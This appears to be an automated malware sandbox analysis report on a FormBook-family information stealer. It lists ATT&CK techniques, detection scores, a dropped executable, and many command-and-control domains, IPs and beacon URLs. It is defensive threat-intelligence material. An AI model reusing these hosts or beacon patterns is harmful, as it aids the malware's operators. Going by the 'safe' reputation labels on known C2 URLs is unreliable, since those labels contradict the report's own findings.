DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	24%	Virustotal		Browse
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	100%	Avira	HEUR/AGEN.1357443
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	100%	Avira	HEUR/AGEN.1357443
C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	27%	ReversingLabs	Win32.Backdoor.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.dandevonald.com	0%	Virustotal	Browse
286live.com	2%	Virustotal	Browse
www.midsouthhealthcare.com	1%	Virustotal	Browse
www.carmen-asa.com	1%	Virustotal	Browse
rs-alohafactorysaleuua.shop	0%	Virustotal	Browse
www.incrediblyxb.christmas	0%	Virustotal	Browse
www.99812.photos	1%	Virustotal	Browse
www.tqqft8l5.xyz	2%	Virustotal	Browse
www.286live.com	1%	Virustotal	Browse
www.jwoalhbn.xyz	0%	Virustotal	Browse
www.rs-alohafactorysaleuua.shop	0%	Virustotal	Browse
www.dunia188j.store	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://www.286live.com	0%	Avira URL Cloud	safe
http://www.dandevonald.com	0%	Avira URL Cloud	safe
http://www.20allhen.onlineReferer:	0%	Avira URL Cloud	safe
http://www.99812.photos/gy15/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	0%	Avira URL Cloud	safe
http://www.286live.com	1%	Virustotal		Browse
http://www.99812.photos/gy15/	2%	Virustotal		Browse
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
https://word.office.comM	0%	Avira URL Cloud	safe
http://www.dandevonald.com	0%	Virustotal		Browse
http://www.dunia188j.store/gy15/www.midsouthhealthcare.com	0%	Avira URL Cloud	safe
http://www.tqqft8l5.xyz/gy15/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shop/gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz	0%	Avira URL Cloud	safe
http://www.286live.com/gy15/	0%	Avira URL Cloud	safe
http://www.99812.photosReferer:	0%	Avira URL Cloud	safe
http://www.tqqft8l5.xyz/gy15/	2%	Virustotal		Browse
http://www.jwoalhbn.xyz	0%	Avira URL Cloud	safe
http://www.ttyijlaw.com/gy15/	0%	Avira URL Cloud	safe
https://wns.windows.com/e	0%	Avira URL Cloud	safe
http://www.99812.photos	1%	Virustotal		Browse
http://www.insurancebygarry.com/gy15/	0%	Avira URL Cloud	safe
http://www.286live.comReferer:	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.jwoalhbn.xyz	0%	Virustotal		Browse
http://www.insurancebygarry.com/gy15/	1%	Virustotal		Browse
http://www.carmen-asa.com/gy15/	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shop/gy15/	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://www.incrediblyxb.christmas/gy15/	0%	Avira URL Cloud	safe
http://www.tqqft8l5.xyzReferer:	0%	Avira URL Cloud	safe
www.dunia188j.store/gy15/	0%	Avira URL Cloud	safe
http://www.carmen-asa.com/gy15/	2%	Virustotal		Browse
http://www.20allhen.online/gy15/	0%	Avira URL Cloud	safe
http://www.incrediblyxb.christmas/gy15/	1%	Virustotal		Browse
http://www.midsouthhealthcare.comReferer:	0%	Avira URL Cloud	safe
http://www.carmen-asa.com/gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl	0%	Avira URL Cloud	safe
http://www.286live.com/gy15/	2%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shop/gy15/	1%	Virustotal		Browse
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	0%	Avira URL Cloud	safe
http://www.dunia188j.store	0%	Avira URL Cloud	safe
http://www.jwoalhbn.xyz/gy15/	0%	Avira URL Cloud	safe
http://www.ttyijlaw.com	0%	Avira URL Cloud	safe
http://www.incrediblyxb.christmas/:80gy15?RzuTsp=0BfZhhXj03xBTAibP1YuAxS	0%	Avira URL Cloud	safe
https://outlook.come	0%	Avira URL Cloud	safe
http://www.dandevonald.comReferer:	0%	Avira URL Cloud	safe
http://www.insurancebygarry.com	0%	Avira URL Cloud	safe
http://www.oiupa.xyz	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	Avira URL Cloud	safe
https://api.msn.com/I	0%	Avira URL Cloud	safe
http://www.dunia188j.store/gy15/	0%	Avira URL Cloud	safe
http://www.99812.photos/gy15/www.20allhen.online	0%	Avira URL Cloud	safe
http://www.vivehogar.net/gy15/	0%	Avira URL Cloud	safe
http://www.incrediblyxb.christmasReferer:	0%	Avira URL Cloud	safe
http://www.dandevonald.com/gy15/	0%	Avira URL Cloud	safe
http://www.insurancebygarry.com/gy15/www.mariaslakedistrict.com	0%	Avira URL Cloud	safe
http://www.insurancebygarry.comReferer:	0%	Avira URL Cloud	safe
http://www.midsouthhealthcare.com/gy15/	0%	Avira URL Cloud	safe
http://www.jwoalhbn.xyz/gy15/www.99812.photos	0%	Avira URL Cloud	safe
http://www.mariaslakedistrict.comReferer:	0%	Avira URL Cloud	safe
http://www.tqqft8l5.xyz	0%	Avira URL Cloud	safe
http://www.dandevonald.com/gy15/www.carmen-asa.com	0%	Avira URL Cloud	safe
http://www.vivehogar.netReferer:	0%	Avira URL Cloud	safe
http://www.286live.com/gy15/www.vivehogar.net	0%	Avira URL Cloud	safe
http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shopReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	0%	Avira URL Cloud	safe
http://www.midsouthhealthcare.com	0%	Avira URL Cloud	safe
http://www.carmen-asa.com	0%	Avira URL Cloud	safe
http://www.vivehogar.net	0%	Avira URL Cloud	safe
http://www.ttyijlaw.comReferer:	0%	Avira URL Cloud	safe
http://www.incrediblyxb.christmas/gy15/www.dunia188j.store	0%	Avira URL Cloud	safe
http://www.rs-alohafactorysaleuua.shop	0%	Avira URL Cloud	safe
http://www.carmen-asa.comReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	0%	Avira URL Cloud	safe
https://excel.office.com-	0%	Avira URL Cloud	safe
http://www.dunia188j.storeReferer:	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	Avira URL Cloud	safe
http://www.incrediblyxb.christmas	0%	Avira URL Cloud	safe
http://www.mariaslakedistrict.com/gy15/	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	0%	Avira URL Cloud	safe
http://www.jwoalhbn.xyzReferer:	0%	Avira URL Cloud	safe
http://www.midsouthhealthcare.com/gy15/www.286live.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.dandevonald.com	172.67.134.182	true	true	0%, Virustotal, Browse	unknown
286live.com	206.233.130.31	true	true	2%, Virustotal, Browse	unknown
www.midsouthhealthcare.com	3.64.163.50	true	false	1%, Virustotal, Browse	unknown
www.carmen-asa.com	157.53.227.1	true	true	1%, Virustotal, Browse	unknown
gtml.huksa.huhusddfnsuegcdn.com	194.41.37.230	true	false		unknown
www.incrediblyxb.christmas	167.172.226.170	true	false	0%, Virustotal, Browse	unknown
rs-alohafactorysaleuua.shop	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.20allhen.online	103.224.182.210	true	false		unknown
www.dunia188j.store	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tqqft8l5.xyz	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.jwoalhbn.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.99812.photos	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.rs-alohafactorysaleuua.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.286live.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.ttyijlaw.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rs-alohafactorysaleuua.shop/gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl	false	Avira URL Cloud: safe	unknown
www.dunia188j.store/gy15/	true	Avira URL Cloud: safe	unknown
http://www.carmen-asa.com/gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl	true	Avira URL Cloud: safe	unknown
http://www.dandevonald.com/gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.99812.photos/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.286live.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dandevonald.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.20allhen.onlineReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comM	explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dunia188j.store/gy15/www.midsouthhealthcare.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tqqft8l5.xyz/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.286live.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.99812.photosReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jwoalhbn.xyz	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.99812.photos	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.ttyijlaw.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/e	explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, KfYvtUBOq.exe, 00000008.00000002.2186011893.0000000002D96000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.insurancebygarry.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.286live.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000009.00000003.2980175213.000000000C406000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980659407.000000000C40C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979452129.000000000C3F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2160546176.000000000C3F2000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vivehogar.net/gy15/www.insurancebygarry.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.carmen-asa.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.rs-alohafactorysaleuua.shop/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.incrediblyxb.christmas/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tqqft8l5.xyzReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.20allhen.online/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.midsouthhealthcare.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dunia188j.store	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jwoalhbn.xyz/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ttyijlaw.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.incrediblyxb.christmas/:80gy15?RzuTsp=0BfZhhXj03xBTAibP1YuAxS	explorer.exe, 00000009.00000002.4590979961.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000564F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000009.00000000.2160546176.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.come	explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dandevonald.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.insurancebygarry.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oiupa.xyz	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/I	explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dunia188j.store/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.99812.photos/gy15/www.20allhen.online	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivehogar.net/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.incrediblyxb.christmasReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
